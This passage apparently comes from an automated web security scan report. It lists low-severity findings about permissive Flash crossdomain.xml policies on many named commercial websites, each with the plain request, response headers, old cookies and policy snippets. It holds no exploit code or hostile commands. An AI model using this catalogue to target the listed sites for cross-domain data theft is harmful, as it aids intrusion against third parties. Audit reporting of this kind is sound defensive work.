P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT
Content-Length: 256
ETag: "100-46ae2f56"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:33 GMT
Connection: close
Set-Cookie: MC=psTVCRkhsKDdSYTuQA5f4D4WS8cSAk2XJXEKBCgwIAA_ewABqjMGBAAAAQAGBU2XJXEAP03; path=/; domain=.fidelity.com; expires=Sun, 01-Apr-2012 13:32:33 GMT
Set-Cookie: v1st=26BDA52822D0120A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fidelity.com" />
<allow-access-from domain="*.fmr.com" />
...[SNIP]...

7.261. http://www.finishline.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.finishline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.finishline.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 29 Apr 2009 18:02:28 GMT
ETag: "4063-111-61eaf500"
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 14:03:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:03:05 GMT
Connection: close
Set-Cookie: TLTSID=3AC9FCC45D32105D5AABD9EA3DBFBA95; Path=/; Domain=.finishline.com
Set-Cookie: TLTUID=3AC9FCC45D32105D5AABD9EA3DBFBA95; Path=/; Domain=.finishline.com; Expires=Sat, 02-04-2021 14:05:13 GMT
Set-Cookie: BIGipServerwww07.finishline.com_pool=385945772.20480.0000; path=/
Set-Cookie: ClientID=5016caeb6736a75e59acca3302e5f579;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*.blastradius.com"/>
...[SNIP]...

7.262. http://www.food.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.food.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.food.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Mar 2011 11:48:55 GMT
Accept-Ranges: bytes
Content-Length: 272
X-Cnection: close
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:42:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:42:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.recipezaar.com"/>
<allow-access-from domain="*.scrippsnetworks.com"/>
...[SNIP]...

7.263. http://www.foodnetwork.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foodnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foodnetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 10 Nov 2009 12:28:07 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:24:48 GMT
Content-Length: 1084
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <
...[SNIP]...
<allow-access-from domain="*.hgtvpro.com"/>
   <allow-access-from domain="*.hgtv.com"/>
   <allow-access-from domain="*.diynetwork.com"/>
   <allow-access-from domain="*.diynet.com"/>
   <allow-access-from domain="*.fineliving.com"/>
   <allow-access-from domain="*.food.com"/>
   <allow-access-from domain="*.foodnetwork.com"/>
   <allow-access-from domain="*.gactv.com"/>
   <allow-access-from domain="*.scrippsonline.com"/>
   <allow-access-from domain="*.hottrends2005.com"/>
   <allow-access-from domain="*.hottrends2006.com"/>
   <allow-access-from domain="*.scrippsnetworks.com"/>
   <allow-access-from domain="*.scripps.com"/>
   <allow-access-from domain="*.chumby.com"/>
   <allow-access-from domain="*.videomment.com"/>
   <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.videomerce.com"/>
...[SNIP]...

7.264. http://www.forbes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forbes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:31:03 GMT
Server: Apache/1.3.26
Vary: Accept-Encoding,User-Agent
Last-Modified: Tue, 22 Dec 2009 15:13:03 GMT
ETag: "11033e1-4fb-4b30e1ff"
Accept-Ranges: bytes
Content-Length: 1275
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" />
<allow-access-from domain="static.scanscout.com" />
...[SNIP]...
<allow-access-from domain="images.forbes.com" />
<allow-access-from domain="rss.forbes.com" />
<allow-access-from domain="video.forbes.com" />
<allow-access-from domain="*.postapp.com" />
<allow-access-from domain="*.widgetbox.com" />
<allow-access-from domain="*.widgetserver.com" />
<allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="rmd.redcated" secure="false" />
...[SNIP]...

7.265. http://www.freelotto.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.freelotto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freelotto.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:40:28 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 21:25:36 GMT
ETag: "2947c-fb-4920d88e85400"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.freelotto.com" />
<allow-access-from domain="i.pinid.com" />
...[SNIP]...

7.266. http://www.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Sat, 02 Apr 2011 13:39:27 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

7.267. http://www.ftd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=8B1BF5185D2F105D0016842AE1A722A7; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=8B1BF5185D2F105D0016842AE1A722A7; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:45:59 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
Last-Modified: Thu, 02 Dec 2010 02:32:40 GMT
ETag: "136-4cf70548"
Content-Type: text/xml
Content-Length: 310
Date: Sat, 02 Apr 2011 13:45:59 GMT
X-Varnish: 1841590900
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.akamai.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

7.268. http://www.funbrain.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.funbrain.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:27:16 GMT
ETag: "d4-44e3a23690f00"
Expires: Sat, 02 Apr 2011 14:27:16 GMT
Last-Modified: Tue, 27 May 2008 18:05:16 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750836369345; path=/; expires=Sun, 01-Apr-12 13:27:16 GMT; domain=.funbrain.com
Content-Length: 212
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.funbrain.com" />
</cross-dom
...[SNIP]...

7.269. http://www.funnyordie.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.funnyordie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.funnyordie.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 22:16:03 GMT
X-Varnish: 2107042366 2107041865
Content-Length: 2171
X-Varnish: 2004702214 2004701541
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/(null)
Date: Sat, 02 Apr 2011 13:34:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.widgetbox.com" />
<allow-access-from domain="*.widgetserver.com" />
<allow-access-from domain="*.spinlets.com" />
<allow-access-from domain="*.ordienetworks.com" />
<allow-access-from domain="*.ordienetworks-staging.com" />
<allow-access-from domain="*.ordienetworks-integration.com" />
<allow-access-from domain="funnyordie.com" />
<allow-access-from domain="*.funnyordie.com" />
<allow-access-from domain="*.funnyordie-staging.com" />
<allow-access-from domain="*.funnyordie-integration.com" />
<allow-access-from domain="*.funnyordie.com.local" />
<allow-access-from domain="shredordie.com" />
<allow-access-from domain="*.shredordie.com" />
<allow-access-from domain="*.shredordie-staging.com" />
<allow-access-from domain="*.shredordie-integration.com" />
<allow-access-from domain="*.shredordie.com.local" />
<allow-access-from domain="eatdrinkordie.com" />
<allow-access-from domain="*.eatdrinkordie.com" />
<allow-access-from domain="*.eatdrinkordie-staging.com" />
<allow-access-from domain="*.eatdrinkordie-integration.com" />
<allow-access-from domain="*.eatdrinkordie.com.local" />
<allow-access-from domain="pwnordie.com" />
<allow-access-from domain="*.pwnordie.com" />
<allow-access-from domain="*.pwnordie-staging.com" />
<allow-access-from domain="*.pwnordie-integration.com" />
<allow-access-from domain="*.pwnordie.com.local" />
<allow-access-from domain="morraderir.com.br" />
<allow-access-from domain="*.morraderir.com.br" />
<allow-access-from domain="*.morraderir-staging.com.br" />
<allow-access-from domain="*.morraderir-integration.com.br" />
<allow-access-from domain="*.morraderir.com.br.local" />
...[SNIP]...
<allow-access-from domain="*.funnyordie.co.uk" />
<allow-access-from domain="*.funnyordie-staging.co.uk" />
<allow-access-from domain="*.funnyordie-integration.co.uk" />
<allow-access-from domain="*.funnyordie.co.uk.local" />
...[SNIP]...

7.270. http://www.gaiaonline.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gaiaonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gaiaonline.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache
Last-Modified: Fri, 25 Mar 2011 18:18:54 GMT
ETag: "308c1ca-4df-a065bf80"
Accept-Ranges: bytes
Content-Length: 1247
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-access-from domain="*.gaiaonline.com" to-ports="443,8080" secure="false"/><allow-access-from domain="*.gaiaonline.com" to-ports="5222" secure="false"/>
...[SNIP]...
<allow-access-from domain="66.147.214.164" to-ports="8080"/><allow-access-from domain="*.brainjelly.com" to-ports="8080"/><allow-access-from domain="*.kongregate.com" to-ports="8080"/>
...[SNIP]...
<allow-access-from domain="*.kongregatestage.com" to-ports="8080"/><allow-access-from domain="*.kongregatetrunk.com" to-ports="8080"/><allow-access-from domain="*.addictinggames.com" to-ports="8080"/>
...[SNIP]...
<allow-access-from domain="*.gworld.com" to-ports="8080" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omgpop.com" to-ports="8080"/><allow-access-from domain="*.iminlikewithyou.com" to-ports="8080"/><allow-access-from domain="*.brightcove.com"/><allow-access-from domain="*.starzmediadigital.com"/>
...[SNIP]...

7.271. http://www.gamespot.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamespot.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:00 GMT
Server: Apache
Last-Modified: Wed, 06 Feb 2008 01:04:07 GMT
ETag: "c4a6ab-1cc-44572ef1bafc0"
Accept-Ranges: bytes
Content-Length: 460
Keep-Alive: timeout=300, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="image.com.com" />
<allow-access-from domain="img.gamespot.com" />
<allow-access-from domain="i.i.com.com" />
<allow-access-from domain="dw.com.com" />
<allow-access-from domain="cnet.com" />
...[SNIP]...

7.272. http://www.gamestop.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamestop.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://www.gamestop.com/crossdomain.xml
Last-Modified: Thu, 31 Mar 2011 16:05:37 GMT
Accept-Ranges: bytes
ETag: "4fb75679bdefcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 725
Date: Sat, 02 Apr 2011 13:33:18 GMT
Connection: close

...<cross-domain-policy>
<allow-access-from domain="*.gamestop.com" secure="false" />
<allow-access-from domain="*.gamestop.ca" secure="false" />
<allow-access-from domain="*.ebgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

7.273. http://www.gamevance.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamevance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamevance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:26 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:31:14 GMT
ETag: "38025d-1a2-48c09db9df880"
Accept-Ranges: bytes
Content-Length: 418
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:53:26 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.gv.facdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...

7.274. http://www.gap.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gap.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1350-1299723512000"
Last-Modified: Thu, 10 Mar 2011 02:18:32 GMT
Content-Type: application/xml
Content-Length: 1350
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<!--
Cross Domain Entry Descriptions:

.gidapps.com: [added 6.40]
U
...[SNIP]...
<allow-access-from domain="*.gidapps.com"/>
...[SNIP]...
<allow-access-from domain="*.assets-gap.com"/>
...[SNIP]...
<allow-access-from domain="*.assets-gid.com"/>
...[SNIP]...
<allow-access-from domain="*.gap1969.com"/>
...[SNIP]...
<allow-access-from domain="akqasfht.vo.llnwd.net"/>
...[SNIP]...

7.275. http://www.gather.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Last-Modified: Tue, 01 Mar 2011 17:46:40 GMT
ETag: "2f82e6-163-49d6f60ee4000"
Accept-Ranges: bytes
Content-Length: 355
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.gather.com"/>
<allow-access-from domain="*.aetna.com"/>
<allow-access-from domain="*.intelihealth.com"/>
...[SNIP]...

7.276. http://www.geico.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.geico.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.geico.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: application/xml; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:35:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:16 GMT
Content-Length: 357
Connection: close
Set-Cookie: SaneID=ED8637E93A1DC1F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.geico.com

<?xml version="1.0" encoding="utf-8"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*.geico.com" />
    <allow-access-from domain="geico.com" />
...[SNIP]...

7.277. http://www.gifts.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gifts.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Set-Cookie: JSESSIONID=39A4FA7D4576C4CD8A488BAD83A9F6A8; Path=/
Content-Language: en-US
Content-Length: 227
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: SERVERID=web01; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gifts.com" secure="false" />
...[SNIP]...

7.278. http://www.godaddy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 02 Apr 2011 12:39:00 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

7.279. http://www.goodreads.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.goodreads.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodreads.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
